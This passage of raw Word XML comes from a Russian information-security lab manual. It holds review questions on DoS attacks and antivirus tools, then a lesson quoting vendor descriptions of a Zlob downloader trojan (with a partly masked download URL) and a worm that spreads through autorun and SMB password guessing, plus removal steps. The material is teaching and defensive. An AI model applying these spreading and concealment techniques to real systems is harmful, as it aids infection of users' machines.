          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Что такое DoS-атака? Какие способы проведения DoS-атаки сущ</w:t>
      </w:r>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ствуют?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Чем отличается Dos-атака от DdoS-атаки?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Какие существуют средства борьбы с вредоносным ПО?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="426" w:hanging="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Что такое поиск по сигнатурам?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Что такое эвристический анализатор?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004E7A8F" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7A8F">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Что такое фаерволл?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="124" w:name="_Toc3811331"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Практическое занятие </w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>.  Изучение форм проявления компьютерных вирусов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Цель работы –</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> изучить пути распространения и формы проявления ко</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пьютерных вирусов.</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В настоящее время большое количество разработчиков антивирусного ПО на своих web-сайтах размещают информацию о новых вирусных угрозах и мерах по их устранению.</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pStyle w:val="Mt--10"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Оборудование и материалы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--2"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Аппаратура.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для выполнения лабораторной работы необходим перс</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нальный компьютер со следующими характеристиками: процессор с тактовой частотой 3000МГц и выше, оперативная память </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Symbol" w:char="F02D"/>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> не менее 4 Гб и более, св</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">бодное дисковое пространство </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Symbol" w:char="F02D"/>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> не менее 1000  Мб, устройство для чтения компакт-дисков, монитор типа Super VGA (число цветов </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Symbol" w:char="F02D"/>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 65535). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--2"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--2"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Программное обеспечение</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для выполнения работы необходима опер</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ционная система, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>библиотека</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft .NET Framework версии 1.1 или выше, антивирусное ПО.</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widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пример  №1 (</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сайт</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>securelist.com</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trojan-Downloader.Win32.Zlob.bhnq</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="918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Look w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4785"/>
        <w:gridCol w:w="4395"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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2C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Время детектирования</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2C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>01 июл 2009 02:49 MSK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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2C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Время выпуска обновления</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2C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>22 июл 2009 18:51 MSK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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2C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Описание опубликовано</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2C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:ind w:firstLine="709"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E1E7E">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>13 окт 2009 12:25 MSK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Технические детали</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Троянская программа, загружающая файлы из сети Интернет без ведома пользователя и запускающая их на выполнение. Является приложением Windows (PE-EXE файл). Имеет размер 6296 байт. Упакована WinUpack. Расп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>кованный размер – около 71 КБ. Написана на C++.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Деструктивная активность</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">После запуска троянец выполняет следующие действия: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Загружает из сети Интернет файл по ссылке:  http://www.xz***vc.net.cn/nba/image.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Загруженный файл сохраняется в системе под следующим именем: %System%\.exe, где – случайная последовательность латинских букв (например: "lltreyk"). На момент создания описания по вышеуказанной ссылке загружался файл размером 55808 байт; детектируется Антивирусом Касперского как "Trojan.Win32.Zybr.vl". </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Запускает загруженный файл на выполнение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">После этого троянец завершает свою работу. После завершения работы троянца его оригинальный файл удаляется. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рекомендации по удалению</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Удалить файл: %System%\.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Произвести полную проверку компьютера антивирусом с обновленными антивирусными базами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пример №2</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Сайт http://vms.drweb.com)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Win32.HLLW.Shadow.based</w:t>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82"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Способы распространения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Сетевой червь Win32.HLLW.Shadow.based, некоторые образцы которого также могут определяться антивирусом Dr.Web как Win32.HLLW.Autorunner.5555, использует для своего распространения сразу </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>несколько способов. Прежде всего — съёмные носители и сетевые диски п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>средством встроенного в Windows механизма автозапуска. В этом случае имя вредоносного файла является случайным и содержится в папке вида RECYCLER\S-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxx-xxxx. Такую же структуру папок использует Корзина Windows для хранения удалённых файлов, что позволяет вирусу оставаться незаметным для пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Кроме того, червь может распространяться по сети с использованием стандартного для Windows-сетей протокола SMB. При этом для организации удалённого доступа к компьютеру Win32.HLLW.Shadow.based перебирает наиболее часто встречающиеся способы задания пароля, а также пароли из св</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>его словаря. При положительном результате поиска червь копирует себя в с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стемную папку компьютера-жертвы и создаёт задание на запуск через опред</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лённый промежуток времени.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Наконец, вирус распространяется по сети с использованием уязвимости, которая устраняется с помощью критичного обновления, описанного в бюлл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
